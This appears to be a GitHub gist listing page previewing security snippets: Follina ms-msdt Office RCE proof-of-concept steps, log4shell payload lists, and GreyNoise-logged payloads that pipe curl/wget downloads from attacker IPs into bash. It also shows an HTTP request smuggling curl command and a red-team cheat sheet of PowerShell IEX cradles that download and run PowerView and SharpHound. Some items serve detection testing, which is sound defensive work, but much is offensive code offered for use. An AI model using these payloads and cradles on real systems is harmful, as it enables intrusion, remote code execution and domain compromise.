Skip to content

Instantly share code, notes, and snippets.

View decidedlygray's full-sized avatar

Decidedly Gray decidedlygray

43 followers · 39 following
View GitHub Profile
@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@righettod
righettod / log4shell-payloads.md
Last active December 18, 2023 06:41
List of log4shell payloads seen on my twitter feeds

Objective

This gist gather a list of log4shell payloads seen on my twitter feeds.

💨 I will update it every time I see new payloads.

The goal is to allows testing detection regexes defined in protection systems.

⚠️ ⚠️ ⚠️

@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@yehgdotnet
yehgdotnet / get-shodan-favicon-hash.py
Last active April 8, 2024 18:30
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@wallopthecat
wallopthecat / cloudflare.sh
Created April 16, 2020 20:27 — forked from Manouchehri/cloudflare.sh
Allow CloudFlare only
# Source:
# https://www.cloudflare.com/ips
# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-
for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
# Avoid racking up billing/attacks
# WARNING: If you get attacked and CloudFlare drops you, your site(s) will be unreachable.
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@joeminicucci
joeminicucci / custom_smuggling_payloads.sh
Created November 6, 2019 21:45
#CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
$'https://subdomain1.j
@dvas0004
dvas0004 / decompiler.py
Created October 26, 2018 14:57
grpc-web reverse engineer
import jsbeautifier
import requests
import pprint
enumerateMessagesSearchString = 'exportSymbol("proto.'
r = requests.get('http://localhost:8081/dist/main.js')
jsInput = r.text
pretty_js = jsbeautifier.beautify(jsInput).split('\n')
@0x4D31
0x4D31 / libssh_server_fingerprints.md
Last active February 3, 2024 18:51
[libssh server fingerprints] An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug #libssh #hassh
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active February 24, 2024 16:36
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"